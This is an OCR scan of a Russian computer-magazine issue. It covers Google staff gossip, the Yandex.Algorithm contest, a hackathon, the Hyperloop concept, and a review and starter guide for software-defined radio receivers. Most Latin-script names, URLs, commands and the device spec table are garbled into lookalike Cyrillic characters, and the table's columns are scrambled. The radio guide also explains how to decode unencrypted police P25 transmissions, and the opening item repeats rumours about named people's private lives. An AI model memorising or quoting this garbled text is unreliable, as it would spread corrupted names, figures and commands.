ка, дополняя гугловскую ОС собственным 
программным обеспечением. Кстати, 
основатель Хаот! Лин Бин тоже когда-то 
работал в СоодЕе. 

Что же «криминального» в этой исто- 
рии, спросишь ты? Дело в том, что уход 
Барра из компании совпал с громкой но- 
востью о разводе сооснователя Сооде 
Сергея Брина с женой Анной Войжитски. 
И неспроста. Западные СМИ быстро вы- 
яснили, что причина развода (и, скорее 
всего, ухода Барра из компании) — роман Брина с 26-летней Амандой Розенберг, ответ- 
ственной за маркетинг Соо4е С!а$$, которая по совместительству является еще и быв- 
шей девушкой Барра. В свое время Аманду из Лондона привез с собой Барра. Он устроил 
ее в отдел маркетинга, сначала в С+, а затем уже в Сбооде С!а$$, где Аманда и познако- 
милась с Сергеем Брином. И хотя теперь Барра отрицает тот факт, что его уход из бооЧе 
как-то связан с этими любовным перипетиями, почему-то мне кажется, что Барра 
лукавит :). 

Также стоит отметить, что развод Брина не должен никак сказаться на Сбооде, — ак- 
ционерный состав компании надежно защищает брачный контракт. Дело в том, что у Анны 
Войжитски не только есть свой бизнес (частная биотехнологическая компания 2ЗапаМе, 
где компания Соое и лично Брин выступают инвесторами), также у нее есть сестра 
Сьюзан Войжитски, которая на данный занимает должность старшего вице-президен- 
та боод!е по рекламе и коммерции. Вот такая Санта-Барбара, дорогой читатель. К тому 
же слухи утверждают, что оскорбленный Барра сейчас активно пытается переманить 
в Хаот! бывших коллег из СооЧе. 


Уход Барра из ком- 
пании совпал 

с громкой ново- 
стью о разводе со- 
основателя Соофе 
Сергея Брина с же- 
ной Анной Войжит- 
ски. И неспроста 


Авотита самая Аманда 
Розенберг, отвечаю- 
щаяв Соод!е за про- 
движение Соод!е С!а$$ 
и распад семьи Брина. 
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АВТОМАТИКА НЕ ВСЕГДА 
ХОРОШО 


—> Компания Мегозо8&, в рамках борьбы с копиями 
пакета М$ О! се, попросила Сооде удалить из по- 
исковой выдачи ссылки на пакет ОрепО{се.огод. 
Разумеется, это не злой умысел, а ошибка автома- 
тики. По той же причине М$ недавно просила Соод!е 
блокировать страницы птсго$ой.сот. 


ВРЕМЯ — ДЕНЫ И 


—> В середине августа все серверы Сбооче пережили 
сбой, отключившись на две минуты. Мировой трафик 
за это время сократился на 40%! Более длительный 
сбой пережил Ататоп. Он был недоступен порядка 
получаса для США, Канады и части Европы. Минута 
простоя обошлась магазину в 66 240 долларов. 


Риа{еВго\мзег - №1 
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ПИРАТСКИЙ БРАУЗЕР 
ЗАПУЩЕН 


—> На волне всеобщей паранойи и истерии ТПе Ризе 

Вау представил собственный защищенный и аноним- 

ный браузер (риа{ебго\мизег.согл). По сути, разработка 
не что иное, как портативный РгеТох для доступа к Тог 

плюс ряд надстроек. Пока браузер доступен только 


для \ММпаом/$. 
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БИТВА 
МОЗГОВ 


За последний месяц я оказался сразу на двух 
соревнованиях, где состязались программи- 
сты. И это были настолько разные форматы, 
что о каждом стоит рассказать подробно. 


СПОРТИВНОЕ ПРОГРАММИРОВАНИЕ 

Расебоок устраивает Наскег Сир. Ежегодно проводится СооФе Соде уат. 
Чем хуже наши компании? Ничем! Яндекс растит чемпионат по программиро- 
ванию с незатейливым названием Яндекс.Алгоритм, финал которого прошел 
в конце августа в Питере. 

По формату это похоже на спринт для программистов. За сто минут необ- 
ходимо решить шесть задач. Решить все — безумно сложно, поэтому важно 
с ходу выделить наиболее простые, чтобы начать с них. Есть суперсложные 
«гробы», их, как правило, решает один участник или вообще никто. Совсем 
простых задач нет — в финале они уже не нужны. У каждого есть любимые 
темы. Кто-то любит задачки на графы, кто-то — на комбинаторику, кто-то — 
на теорию чисел. 

Но это не единственный элемент тактики. Яндекс.Алгоритм интересен 
правилами, которые позволяют использовать разные стратегии. Все задания 
стоят одинаковое количество очков, но бонус зависит от того, как отправлять 
решения. Задачи можно сдавать «в открытую» (проверочная система сразу 
отвечает, «прошла» задача или нет). А можно послать ее «втемную» и узнать 
результат только в конце соревнований. Риск оплачивается большим количе- 
ством очков, и игроки готовы на него идти. 

Соревнование проходит в несколько этапов. Всего зарегистрировалось 
более 3000 человек из 84 стран мира. В офлайновый финал, который про- 
ходил в Питере, вышло 25 человек из 8 разных стран. Главная интрига заклю- 
чалась в борьбе между одним из трех золотых финалистов ИТМО Геннадием 
Короткевичем (талантливый первокурсник, который уже в школе показывал 
невероятные результаты) и Петром Митричевым из Сооде (про Петю скла- 
дываются легенды :)). Оба занимают топовые позиции в рейтинге Тор Сочдег. 
Победителем, впрочем, стал Геннадий Короткевич, а Митричев не попал 
в тройку. 

Участники очень сильно натренированы решать такие задачки, хотя сами 
признаются, что в реальной работе они попадаются в лучшем случае раз 
в месяц. Но люди именно с такими скиллами могут выстраивать эффектив- 
ную работу с 59а дааа, разрабатывать компьютерное зрение, алгоритмы сжа- 
тия, заниматься наукой. И это очень круто. 

Кстати, такие соревнования не только Тип. Это и дополнительный финан- 
совый стимул. Например, победитель «Алгоритма» получает 300 тысяч ру- 
блей. Если ездить и выигрывать соревнования круглый год, выходит неплохая 
прибавка к зарплате :). 
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КОЛОНКА 
СТЕПЫ 
ИЛЬИНА 


СОЗДАЙ ПРОДУКТ ЗА 24 ЧАСА 

Хакатон — это совсем другой формат. Здесь не нужно знать алгоритмы, 
но надо уметь работать в команде и делать настоящие продукты. Особенно 
хорошо, если это у тебя получается быстро, — на все отводится 24 часа. 

В начале сентября прошел российский этап хак-марафона РауРа! ВаШе 
Наск (Башеваск.ога/позсом/) — нон-стоп событие, в котором могут участво- 
вать все, кто хочет создавать продукты. Молодые предприниматели, дизайне- 
ры и, самое главное, программисты :). Здесьуже нет искусственных и тщатель- 
но проработанных задач. Есть цель — создать веб- или мобильный продукт, 
решающий проблемы больших городов. А что это будет — нужно придумать 
как раз самим. К услугам любые стеки технологий, любые АР! разных сервисов 
(в том числе, естественно, организатора — РауРа!), любые вспомогательные 
средства. Лишь бы в результате получился работающий прототип. Многие 
приходят на хакатон уже со своей командой (еще до мероприятия на разных 
сайтах можно было найти топики, в которых кто-то рассказывал о своей идее 
в поиске единомышленников для реализации на хакатоне). Однако есть и те, 
кто формирует команды прямо на месте — в этом, наверное, есть особый фан. 
Хотя шансов на победу в последнем случае, как мне кажется, меньше. 

Как это выглядит? Утром первого дня участники получили время для об- 
щения и формирования команд, после чего представили 38 идей (в работу 
пошли только 21). Программировать все команды начали в одно ито же время 
и получили 24 часа в свое распоряжение. Работа над кодом шла с полудня 
субботы — всю ночь и всю первую половину следующего дня. 

Я приехал к полудню воскресенья, не выспавшись. Но когда увидел 
парней, которые всю ночь кодили, поддерживая себя Веа ВуГом, понял, 
что жаловаться мне не на что :). Было приятно встретить среди участников 
нескольких знакомых людей. Состоявшихся профи, но заражающих энтузи- 
азмом и энергией людей — пример того, что участвовать в хакатонах никогда 
не поздно. 

Победителем московского этапа РауРа! Вай е Наск стал проект ТаКтосСКу. 
Парни создали настоящий городской навигатор для слепых и слабовидящих, 
за что получили главный приз — оплаченное участие в мировом финале в Си- 
ликоновой долине и шанс для команды стать одним из десяти счастливчиков, 
которые выиграют 100 тысяч долларов. 

Может, в следующем хакатоне поучаствую ия :). Главное — не стать без- 
дельником, которые есть в любой команде. А для этого неплохо бы не расте- 
рять скилл в программировании. = 


Неааег 
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РгооГ!-о!-СопсерЕ 


г ТРАНСПОРТИРОВКА ЛЮДЕЙ ПО ТУННЕЛЮ 
[1 СО СКОРОСТЬЮ 1200 КМ/Ч 
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ЧТО ЭТОТАКОЕ 

Нурепоор (зрасех.сот/пурейоор) — концепту- 
альный проект нового типа общественного транс- 
порта, способного перевозить людей на большие 
расстояния на скорости около 1220 км/ч, что пре- 
вышает скорость пассажирских самолетов и при- 
мерно соответствует скорости звука в воздухе. 

Автор концепции Элон Маск, владелец ком- 
паний Теза Мо{тог$ и Зрасех, известен своими 
инновационными идеями и изобретениями. Бо- 
лее того, он успешно воплощает их в жизнь. Маск 
ставит Нурейоор в один ряд с четырьмя другими 
видами транспорта: автомобильным, железнодо- 
рожным, водным, воздушным. Если идею удастся 
реализовать, то капсулы Нурейоор станут пятым 
видом транспорта в этом списке. 

Изобретатель опубликовал «альфа-версию» 
дизайна Нурейоор (6и.1у/17У)Кпра) с техниче- 
скими спецификациями туннеля и транспортных 
капсул, экономические расчеты для строитель- 
ства и эксплуатации системы. Элон Маск пред- 
лагает заинтересованным специалистам взять 
этот проект за основу, доработать детали и до- 
вести до стадии коммерческой эксплуатации. 
Он считает, что Нурейоор может стать настоя- 
щим краудсорсинговым ореп $оигсе проектом, 
который будет создаваться силами широкого 
сообщества. 


ЗАЧЕМ ЭТО НУЖНО 
Транспортные капсулы по скорости сравнимы 
с самолетами, по удобству посадки — с поезда- 
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ми. При этом они, в идеале, безопаснее, эффек- 
тивнее и не зависят от погодных условий. Элон 
Маск уверен, что транспортные туннели могут 
быть даже гораздо экономичнее, чем любой дру- 
гой транспорт. По его расчетам, проект туннеля 
между Сан-Франциско и Лос-Анджелесом дли- 
ной 570 + 570 км окупится за 20 лет при стоимости 
билета в 20 долларов, если не учитывать эксплуа- 
тационных расходов. 

Нурейоор полностью обеспечивает себя 
электроэнергией благодаря покрытию всей тру- 
бы солнечными панелями. Для работы требует- 
ся 21 МВт, а панели выдадут 57 МВт в солнечный 
день. 

Капсулы вместимостью 28 пассажиров можно 
отправлять со станции каждые 30 с. Это позво- 
лит перемещать между теми же Сан-Франциско 
и Лос-Анджелесом до 7,4 миллиона человек в год 
в каждую сторону. По мнению Маска, новый вид 
транспорта лучше всего подходит для соедине- 
ния парами туннелей густонаселенных мегаполи- 
сов, находящихся на расстоянии до 1500 м. В СНГ 
идеальными маршрутами были бы Москва — 
Санкт-Петербург (635 км по прямой), Москва — 
Киев (757 км), Москва — Екатеринбург (1418 км). 
Максимальная скорость 1220 км/ч между Сан- 
Франциско и Лос-Анджелесом достигается 
при ускорении не более 0,59 для комфорта пасса- 
жиров. В городской черте капсулы будут двигать- 
ся относительно медленно: разгон до 480 км/ч 
в первые 167 с. Расчетное время в пути на марш- 
руте 570 км составит 2134 с (35 мин). 


КАК ЭТО РАБОТАЕТ 

Капсулы Нурейоор двигаются в разреженном 
воздухе, рабочее давление в туннеле — 100 Па, 
то есть почти вакуум. Ускорение капсул осу- 
ществляется с помощью магнитных ускорителей 
в туннеле и роторов на каждой капсуле. Рассто- 
яние между ними в 20 мм сохраняется благода- 
ря электромагнитному полю, а также воздушной 
подушке, нагнетаемой компрессорами на крей- 
серской скорости. Компрессоры заодно созда- 
ют разрежение перед капсулой, втягивая воздух 
внутрь (рис. 2). Для движения на малых скоростях 
перед высадкой пассажиров есть колеса. 

К сожалению, для успешной реализации 
проекта предстоит решить еще множество тех- 
нических проблем, одна из главных — тепловое 
расширение трубы. Например, при увеличении 
температуры на 40 °С металлическая труба 500 км 
удлинится примерно на 300 м. В обычных трубо- 
проводах проблему решают ЦУ-образными встав- 
ками, которые амортизируют тепловое расши- 
рение по всей длине трубы. В железнодорожном 
транспорте между шпалами оставляют зазоры, 
из-за которых колеса вагонов издают характер- 
ный стук. В транспортном туннеле такие варианты 
не пройдут, потому что капсулы с людьми должны 
двигаться по прямой и не могут резко повернуть 
на 90°, да и зазоры не оставишь из-за низкого 
давления. 

Будем надеяться, что эти проблемы скоро 
удастся решить, и тогда можно будет прокатиться 
из Москвы в Питер за 39 минут. = 


Рис. 1. Модель Нурепоор в программе 
309-моделирования 


Рис. 4. Рендерингконцептуального дизайнатранс- 
портной капсулы с открытыми дверями на станции 


Рис. 2. Расчет обтекания капсулы воздухом с втя- 
гиванием через компрессор на скорости, близкой 
кскорости звука 


Рис. 5. Рендерингконцептуального дизайнатранс- 
портной капсулы 


Рис. 3. Модельтуннеля наплатформах с покрытием 
крыши солнечными панелями 


Рис. 6. Транспортная капсула спассажирами 
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КАК СЛУЧИЛАСЬ НАСТОЯЩАЯ РАДИОРЕВОЛЮЦИЯ (3 


Радио на софтварном уровне — потрясающе перспективная штука, дающая 
почти неограниченную свободу для анализа сигнала и взаимодействия с ра- 
диоустройствами. Еще совсем недавно это удовольствие было доступно лишь Е 
избранным, но сейчас вокруг ЗОН формируется огромное комьюнити любите- 

лей и профессионалов. 


Пальцем в небо 
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оН\м/аге аейпеа га о, как нетрудно догадаться, — это 

такой вариант конструкции радиоприемника, при кото- 

ром часть его реализована программным образом. ОР 
позволяет отказаться от идеи создания узкоспециализирован- 
ных хардкорных приемопередатчиков из рассыпухи и крепкого 
матерного слова и использовать для большей части обработки 
сигналов СРУ обычного компа и ЕРСА/СРИО на плате. 

Типичная схема: «в железе» реализован усилитель радио- 
сигнала с антенны, перестраиваемый фильтр (грубо «выреза- 
ющий» нужный диапазон частот) и квадратурный демодулятор, 
который точно вырезает «кусочек» эфира, начиная с нужной 
частоты в виде |- и О-потоков. Эти потоки оцифровываются 
АЦП — и отправляются в компьютер на дальнейшую обработку. 

Отличие между потоками | и О в том, что они сдвинуты 
по фазе на 90 градусов и позволяют при последующей обра- 
ботке из сигнала получить как амплитудную, так и фазовую со- 
ставляющую. Например, для прослушивания АМ-радио было 
бы достаточно и одного (любого) потока, а вот ЕМ без инфор- 
мации о фазе без существенных потерь качества не декодиро- 
вать. 

Частота дискретизации потоков | и @ ограничивает ширину 
радиоэфира, которую будет одновременно видно на компью- 
тере. В случае АВТЕ2832 это, в зависимости от настровк, от 0,25 
до 3,2 МГц. 

Программное обеспечение на компьютере, получив потоки 
[и О, может в реальном времени декодировать радиопереда- 


\АФ 


| М | | 


чу из любого участка диапазона в любом из поддерживаемых 
стандартов модуляции (АМ, ЕМ и их вариации) или просто 
слить весь эфир в файл. 

Сама концепция ЗОВ существовала достаточно давно. Вот 
только до последнего времени, если ты хотел этим занять- 
ся, у тебя было два варианта: для «совсем маленьких» или же 
для «совсем взрослых». Первым можно было предложить АТЕ- 
ЗОВ за 30 баксов. Это целое семейство китайских Т\/-тюнеров 
на основе микросхемы ВАТЕ2832, в которых внезапно" была об- 
наружена функциональность универсального ЗОВ-приемника. 
Второй вариант — семейство УЗНР, профессиональных тран- 
сиверов от компании ЕЙйи$ Везеагсй, стоимость которых начи- 
нается с 700 долларов. Используется, например, для развора- 
чивания базовых станций @$М с помощью ОрепВТ$. 

Тем не менее именно первый, «детский» вариант привел 
к тому буму интереса к ЗОВ, который мы видим сейчас. Понят- 
но, что китайский ТВ-тюнер не отличается точностью и мощ- 
ностью. Понятно, что работает он только на прием. Но на его 
основе умельцы ухитрялись делать самые интересные штуки. 
И это было первым шагом. 

А следующим шагом стали доступные девайсы с возможно- 
стью передачи и расширенным диапазоном частот. Потенциал 
огромный: программирование радиодевайсов, анализ лю- 
бых сигналов, от любительского радио до высокоскоростных 
[ТЕ-сетей. Мы еще только вступаем в этот дивный новый мир. 
Но точно будет интересно. 2= 
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ДЛЯ ВСЕХ 
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И КАЖДОГО 


2013 год замечателен тем, что у любителей ОН наконец-то появился выбор, 
а не просто метания от 20-долларового НТИ-ЗОН к 700-долларовому ЦЗНР. 
Сразу несколько девайсов позволяют подобрать трансивер под конкретную 


задачу. Давай посмотрим на сильные и слабые стороны каждого. 


НАСКАЕР 

Самое доступное полноценное $ОН. Это уже 
не первый удачный продукт Майкла Оссмана, 
в прошлом выпустившего первый бюджетный 
Вуиаосй-снифер Убецосй (см. статью «Ха- 
керский чемоданчик» в августовском «Хакере» 
за прошлый год). Майкл уже провел успешную 
кампанию на КскзЗацег, собрав на производство 
НаскАЕ около 600 тысяч долларов. Первые 500 
предпродажных образцов уже были выданы бета- 
тестерам, и на основе их отзывов будут исправле- 
ны недочеты в финальном продукте. 

НаскАР’у из коробки доступен достаточно 
широкий диапазон частот, от 30 МГц до 6 ГГц, 
что сравнимо с более дорогими устройствами 
из семейства ЧЗНАР (50 МГц — 6 ГГц). Частота 
дискретизации составляет 20 МГц. Это значит, 
что с помощью приемника можно будет анализи- 


ровать, например, \ММ-Н-сигнал на частоте 5 ГГц 
ивысокоскоростные (ТЕ-передачи. В более доро- 
гой комплектации идет конвертер Нат К Ор, с по- 
мощью которого можно будет улавливать сигнал 
на частоте от 300 кГц. 

Среди недостатков можно отметить то, 
что НаскАЕ работает только в режиме полудуплек- 
са, то есть в один момент можно либо отправлять, 
либо принимать сигнал. Для переключения между 
режимами каждый раз придется отправлять соот- 
ветствующую команду, что может добавить неже- 
лательную задержку. Однако при желании можно 
объединить два приемника и получить поддержку 
полного дуплекса. Также, в отличие от БааденЕ 
и более дорогих УЗВР НасКкНЕ использует ЦЗВ 2, 
а не ЧЗВ 3. Кроме того, в НаскНЕ используется 
8-битный АЦЛП (у МааенРЕ — 12 бит), что негативно 
сказывается на точности срабатывания. 


Тауог КИНап 


ВЕАОЕВЕ 

Еще один успешный проект с КскЗацщега. 
ВааевЕ работает с меньшим по сравнению 
с НаскАЕ диапазоном частот, от 300 МГц до 3,8 
ГГц, так что 5-гигагерцовый \М/!-Н-сигнал ему не- 
доступен. Также ведется работа над дополни- 
тельной платой, которая должна позволить прием 
сигнала на частоте от 10 МГц. 

Отличительная особенность МадеАЕ — воз- 
можность работы в режиме полного дуплекса. 
По сравнению с НаскНЕ данный приемник имеет 
большую частоту дискретизации (28 МГц), боль- 
шую разрядность АЦП (12 бит) и поддержку УЗВ 
3.0. С использованием УЗВ 3 в $ОА-приемниках 
связаны определенные опасения, так как это мо- 
жет вносить помехи на частоте 2,4 ГГц, поэтому 
БааеНЕ поставляется с дополнительным экрани- 
рованием чувствительных элементов. 
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ОМТВХ 
Устройство от Гай\м/ауе$ не вписывается в обзор по цене, но достойно 
упоминания просто потому, что было разработано российской коман- 
дой. Это единственный полноценный (не ММО) двухканальный при- 
емопередатчик в этом обзоре. В качестве радиочипов используются два 
чипа 1М$60020, поэтому частотный диапазон и разрядность ЦАП/АЦП 
полностью совпадают с МааенНЕ использующим тот же чип. Трансивер 
разрабатывался с большим фокусом нателеком, поэтому и частота дис- 
кретизации совпадает с таковой у @С$М и составляет 13 МГц. Заменой 
опорного генератора можно довести частоту дискретизации до 20 МГц, 
ав будущих версиях УтТНАХ — до 40 МГц. Кроме стандартной прошивки, 
есть прошивка, поддерживающая четыре канала приема без передачи. 
Кроме двухканальности, отличительная черта УтГВХ — это индустри- 
альное исполнение, использование «взрослого» 1а6 Етете вместо 
УЗВ и наличие на борту приемника СР$ — для обеспечения высокой точ- 
ности опорного генератора, требуемой для таких стандартов, как @$М. 
Всеми этими наворотами и объясняется высокая цена устройства. 
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9$ВРВ100 $ТАВТЕВ/В 200 

Сразу два устройства в семействе УЗНР можно приобрести 
по одной и той же цене. При этом В100 значительно уступает 
более дешевым НаскНЕ и ШааеНЕ Ему доступен диапазон ча- 
стот от 50 МГц до 2,2 ГГц, а частота дискретизации составляет 
16 МГц. При этом для подключения в В100 используется ЦЗВ 2. 
В обеих моделях доступен режим полного дуплекса. 

В200 работает с более широким диапазоном частот, от 50 
МПу до 6 ГГц. Частота дискретизации составляет 61,44 МГц. 
Для подключения в В200 используется УЗВ 3. Более дорогая 
(1100 долларов) версия В210 оснащена двумя передатчиками. 

Сильная сторона УЗНР заключается в том, что эти продукты 
существуют на рынке с 2006 года и за это время успели обрасти 
огромным количеством стороннего софта и наработок. 


ВЫВОД 

Будущее $ОР выглядит как никогда позитивно: на рынок 
выходит сразу несколько доступных трансиверов. НаскВЕ 
благодаря своей цене, возможностям и открытости, станет 
хорошим выбором для начинающих пользователей. Более 
мощный БаденЕ с его навороченным ЕРСА и поддержкой 
(ЗВ 3 лучше подойдет для автономных проектов, ну а много- 
функциональные У$ЗВР В100 и В200 вплотную приближают 
любительский сегмент рынка к «взрослым» решениям уров- 


КТ навяе |  Бабейе = | УБЕРВ1ОО але | 1388200 итях 


Диапазон частот 30 МГ — 6 ГГ 300 МГу — 3,8 ГГц 50 МГц — 2,2 ГГц 50 МП — 6 ГГ 300 МГи — 3,8 ГГц 
Частота 2 канала по 13 МГц 
дискретизации 20 МГц 28 МГц 16 МГ 61,44. МГц (до 40 МГЦ) 
Дуплекс полу ПОЛНЫЙ ПОЛНЫЙ ПОЛНЫЙ полный + 2 канала 
АЦП, разрядность 8бит 12 бит 12 бит / 14 бит 12 бит 12 бит 


АЦП, скорость 


20 миллионов 


40 миллионов 


64/128 миллионов 


преобразования в. отсчетов в секунду = отсчетов в секунду 
Интерфейс 
подключения И5В2 5 у5В3 0$В 2 Н$ 
40/115 тысяч 25 

ЕРСА отсутствует логических СКИХ 

р элементов = 
Микроконтроллер 1РС4ЗХХ Сурге$$ ЕХЗ Сургез$$ ЕХ2 
А январь 2014 года уже продается уже продается 
Цена 300 $ 420/650 $ 675 $ 


61,44 миллионов 
отсчетов в секунду 


Ц$В 3 


15 тысяч логических 
элементов 


Сурге5$ ЕХЗ 


уже продается 


675 $ 


2 канала по 13 
миллионов отсчетов 
в секунду (до 40 
миллионов отсчетов 
в секунду) 


1265 Ейете{ 


15 тысяч логических 
элементов 


отсутствует 
уже продается 


1500 $ 
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Уверен, для многих из вас, как и для меня совсем недавно, происходящее 
в радиоэфире было настоящей магией. Мы включаем телевизор или радио, 

поднимаем трубку сотового телефона, определяем свое положение на карте 
по спутникам СР$ или ГЛОНАСС — и все это работает автоматически. Благо- 


у 


Михаил Сваричевский 


даря НВТЕ-$ОР у нас появился доступный способ заглянуть внутрь всего этого 


волшебства. 


ак уже говорилось, РТЕ-ЗОВ — это целое семейство 

дешевых ТВ-тюнеров, способных выполнять функ- 

цию $5ОА-приемника. У этих игрушек разные на- 

звания и бренды, но объединяет их одно — все они 
построены на чипсете РТЁЕ2832. Это микросхема, содержащая 
два 8-битных АЦП с частотой дискретизации до 3,2 МП (одна- 
ко выше 2,8 МП могут быть потери данных), и интерфейс УЗВ 
для связи с компьютером. Эта микросхема на входе принимает 
|- и О-потоки, которые должны быть получены другой микро- 
схемой. 

А820ТиЕ4000 — это две наиболее удобные для ОР микро- 
схемы, реализующие радиочастотную часть ЗОВ: усилитель 
антенны, перестраиваемый фильтр и квадратурный демодуля- 
тор с синтезатором частоты. На рисунке — блок-схема Е4000. 

Разница между ними следующая: Е4000 работает в диа- 
пазоне -52-2200 МГц и имеет немного большую чувствитель- 
ность на частотах менее 160 МГц. Из-за того что производитель 
Е4000 обанкротился и микросхема снята с производства, оста- 
ющиеся тюнеры покупать все труднее, и цены на них растут. 

В820Т работает в диапазоне 24-1766 МГц, однако диапазон 
перестройки внутренних фильтров сильно затрудняет работу 
А820Т выше 1200 МГц (что делает невозможным, например, 
прием СР$). На данный момент тюнеры на этой микросхеме 
легко купить, и стоят они около 10-11 долларов. 

Также продаются тюнеры на микросхемах ЕС0012/ЕС0013/ 
ЕС2580 — у них очень серьезные ограничения по частотам ра- 


Типичный 


приемникнаос- 
нове ВТЕ2832 — 


Е ”Т\б68 


боты, и лучше их не покупать. Узнать, на какой микросхеме сде- 
лан тюнер, можно в описании товара или спросив у продавца. 
Если информации по используемым чипам нет — лучше купить 
в другом месте. 


ПОКУПКА 
В розничных магазинах их не найти, поэтому нам поможет 
. Пишем в поиске В820Т или Е4000, сортируем 
по количеству заказов, внимательно читаем описание (там 
должно быть явно написано, что тюнер использует микросхе- 
мы ВРТЁ2832 + Е4000 или АТЕ2832 + В820Т), и можно заказы- 
вать. Присылают обычно почтой России, в течение 3-6 недель. 
В комплекте с тюнером будет и крошечная антенна — ее, 
конечно, лучше заменить. Хорошие результаты можно полу- 
чить, используя обычную комнатную телевизионную антенну 
МВ-ДМВ «рога». В описании товара также нужно обратить вни- 
мание на разъем антенны — и либо искать тюнер с обычным 
телевизионным разъемом, либо расчехлять паяльник и делать 
переходник / перепаивать разъем. При пайке очень легко убить 
устройство статическим электричеством, так что заземляйся. 
На многих тюнерах рядом с коннектором антенны отсут- 
ствуют защитные диоды (в данном случае 17) — их можно либо 
впаять самому (один к земле, один от земли — я, например, 
впаял 1№4148), либо оставить как есть, только антенну голыми 
руками не трогать и всячески беречь от статического электри- 
чества. 


ЗОР за 10$ 
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ВТЬ_$ОВ 
ВИ $аг — драйвер, обеспечивающий «нецелевое» использо- 
вание данных с Т\-тюнеров на базе ВТЕ2832. В \Мтаом5$ тебе 
придется заменить драйвер тюнера по умолчанию на \ММпу$В 
с помощью программы Фа. 

ВИзаг.а! требуют все 5ОВ-программы, и зачастую эта ОИ: 
уже идет в поставке софта, использующего АТЕ2832. 

АИ $9г также можно использовать и через консольную 
утилиту, чтобы протестировать тюнер или слить кусок эфира 
в файл: 


гЕ1 $@г -+ 1575520000 -в 34 -$ 2048000 ои{.4а* 


При дальнейшей обработке нужно помнить, что в файле 
байты |- и @-потоков идут поочередно. 


5ОВЗНААР 

5ОАФПагр ( ) — одна из популярных и простых 
в использовании программ под \ММпаом/$ для работы с ВТЕ2832 
(и некоторыми другими $ОВ). При старте нужно выбрать 
ВТЕ2832, нажав на кнопку Егот-епа. Вводить частоту руками 
нужно в поле Сещег. 

Слева вверху — выбор типа демодулирования. ЕМ исполь- 
зуется для обычного ЕМ-вещания и аудио в аналоговом теле- 
видении, АМ — в радиостанциях на низких частотах и для пере- 
говоров самолетов, МЕМ — в рации. 

Многие внешние декодеры цифровых передач работа- 
ют через «аналоговый» интерфейс — то есть ты запускаешь 
5ОАбпагр, устанавливаешь программу \/Шчца! Аиаю СаЫе ( 

‚ программа платная), настраиваешь ЗОВА$вПагр, 
чтобы он декодированный звук выводил в \АС, и в системных 
настройках \\Ипао\м$ указываешь МАС как устройство записи 
по умолчанию. В результате внешняя программа-декодер будет 
получать звук от ЗОАЗпагр. 

Таким образом подключаются декодеры Р25-раций (поли- 
ция), данных с метеоспутников, пейджеров, навигационных со- 
общений самолетов (АОЗ$-В) и многого другого (об этом ниже). 
Такой необычный способ подключения сложился историче- 


Блок-схема 


тюнераЕ4000 
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Прием переговоров по рации начастоте 446 МГцв 5ОВ$Пагр 


79 


ски — раныше к компьютеру подключали аналоговые приемни- 
ки. Со временем декодеры дописывают, чтобы они напрямую 
работали с ВТЕ-$ОВ. 


СМИВАОО 

СМУ Вааю ( ) — настоящий зубр $ОВ. Это про- 
граммный пакет, предназначенный для обработки данных, 
полученных от 5ОВ-приемника, в реальном времени. Являю- 
щаяся стандартом де-факто для всех более-менее профес- 
сиональных забав в области радио, программа построена 
на модульной основе с учетом парадигмы ООП. Это настоящий 
радиоконструктор, в котором роль элементов отведена функ- 
циональным блокам: фильтрам, модуляторам/демодуляторам 
и несметному множеству других примитивов обработки сиг- 
налов. Таким образом, имеется возможность составить из них 
практически любой тракт обработки. Делается это в прямом 
смысле слова в несколько кликов мышкой в наглядном графи- 
ческом редакторе, имя которому дпига4ю-сотрапюп. Более 
того, апига4ю-сотрапюп написан на РУПоп и позволяет гене- 
рировать схемы на РУПоп. Но у такой гибкости есть и обратная 
сторона — освоить СМУ Вад за десять минут невозможно. 


РАСШИРЕНИЕ ДИАПАЗОНА ПОДДЕРЖИВАЕМЫХ 
ЧАСТОТ 

Ниже -52 МГц / 24 МГ\ находится болышая часть интересного 
в радиоэфире — поэтому ограничение по минимальной часто- 
те серьезно сужает возможности этих приемников. Расширить 
диапазон можно, купив ир-сопуещег, который сдвинет сигнал 
с антенны на 100 или 125 МГц вверх. Среди продающихся кон- 
вертеров пока лучше всех себя показывает МооЕес — Нат К Ур 
\1.2 с кварцем на 125 МГц. Использование кварца на 125 МГц 
очень важно, так как в районе 100 МГц находится много мощных 
ЕМ-станций и без очень качественного экранирования всех ча- 
стей системы они будут мешать приему. 

Этот конвертер можно использовать с любыми $О0В- 
системами, в том числе и работающими на передачу (есть огра- 
ничение на мощность). 

Для приема на частотах менее 50 МГу придется больше 
внимания уделить антенне, так как габариты ее растут про- 
порционально увеличению длины волны. Конструкций антенн 
для любительской радиосвязи в КВ-диапазоне очень много, 
но в самом простейшем случае — это спускаемый с балкона 
провод длиной 5-20 м. 


МАЛОШУМЯЩИЙ УСИЛИТЕЛЬ 

И Е4000, и А820Т — кремниевые микросхемы, и усилитель вну- 
три них шумит сильнее, чем более дорогие отдельные СаА$5- 
усилители. Для снижения уровня шумов (на 1,5-3 дБ) и улучше- 
ния возможностей приема очень слабых сигналов можно купить 
малошумящий усилитель, который включается между антенной 
и тюнером. Один из вариантов — МА Тога! ( ). 


СОУЕПЗТОВУ 


РАДИОПЕРЕГОВОРЫ 
ВБЕЗЛИЦЕНЗИОННЫХ ДИАПАЗОНАХ 

Гражданские рации, не требующие регистрации в России, ра- 
ботают на частотах 433 и 446 МГц. Впрочем, в Москве русскую 
речь там уловить сложно. Их сразу и без проблем слышно 
в 5ОАЗпагр, модуляция МЕМ. 

Поскольку каналов много, очень полезен плагин 
для ЭОАЗФПагр АщоТипег Ршот ( ) — он автомати- 
чески включает частоту, на которой ведется передача, и таким 
образом можно слушать сразу все каналы раций. 

Чтобы слушать рации начастоте 27 МГц, нужен тюнер с микро- 
схемой В820Т или внешний конвертер в случае Е4000 (например, 
тот же Нат К Ур \1.2). Оптимальная антенна для 27 МГц уже тре- 
буется более серьезная, длиной -2,59 или -1,23 м. 


РАДИОПЕРЕГОВОРЫ ПОЛИЦИИ 
Полиция в Москве и во многих других регионах России перешла 
на использование цифровых радиостанций, работающих в стан- 
дарте АРСО-25 (Р25). В Р25 данные передаются в цифровом 
виде со сжатием и кодами коррекции ошибок — это позволяет 
увеличить дальность устойчивой связи и больше каналов впих- 
нуть в ту же полосу радиочастот. Также существует опциональ- 
ная возможность шифрования переговоров, однако обычная по- 
лиция работает без шифрования. 

Для приема Р25-раций можно использовать декодер 0$0 
( ). О$0 ожидает аудиоданные на входе. Перена- 
править аудио с 5ОВЗ$Вагр в О$ЗО можно с помощью Мщиа! Аиаю 
СаЫе. 050 весьма критичен к настройкам 5ОА$Пагр — я реко- 
мендую устанавливать АЁЕ Сат около 20-40%, возможно отклю- 
